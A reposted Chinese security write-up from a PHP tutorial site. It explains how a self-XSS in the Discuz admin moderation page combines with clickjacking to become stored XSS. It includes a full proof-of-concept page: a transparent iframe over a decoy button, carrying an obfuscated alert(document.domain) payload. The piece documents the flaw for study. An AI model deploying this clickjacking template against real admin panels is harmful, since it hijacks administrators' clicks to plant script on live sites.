来源:自学PHP网 时间:2015-04-15 15:00 作者: 阅读:次
[导读] Self XSS + Click Jacking == 存储型 XSShttp: hi baidu com hacklele admin php?frames=yesaction=moderateoperation=threads,页面内有个隐藏表单title,可以GET 提交,管理点击『提交』后触发。由...
|
Self XSS + Click Jacking ==> 存储型 XSS
http://hi.baidu.com/hacklele/admin.php?frames=yes&action=moderate&operation=threads,页面内有个隐藏表单”title”,可以GET 提交,管理点击『提交』后触发。
由于是一个 Self XSS,不好利用,而 Discuz 后台是可以通过 iframe 标签引用的,导致我们可以结合 Click Jacking(点击劫持)加以利用。
<html> <head> <title>Dz XSS Demo</title> <style type="text/css"> #click{ height: 25px; width: 60px; top: 710px; left: 220px; position: absolute; z-index: 1; } #hidden{ height: 500px; width: 500px; top: 320px; left: 45px; filter: alpha(opacity=0); opacity: 0; position: absolute; z-index: 2 } </style> </head> <body> <img src="girl.jpg"> <button id="click">下一页</button> <iframe id="hidden" src="http://hi.baidu.com/hacklele/admin.php?frames=yes&action=moderate&operation=threads&title=%26%23x27%26%23x29%26%23x22%26%23x29%26%23x3b%26%23x61%26%23x6c%26%23x65%26%23x72%26%23x74%26%23x28%26%23x64%26%23x6f%26%23x63%26%23x75%26%23x6d%26%23x65%26%23x6e%26%23x74%26%23x2e%26%23x64%26%23x6f%26%23x6d%26%23x61%26%23x69%26%23x6e%26%23x29%26%23x3b%26%23x2f%26%23x2f"></iframe> </body>
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
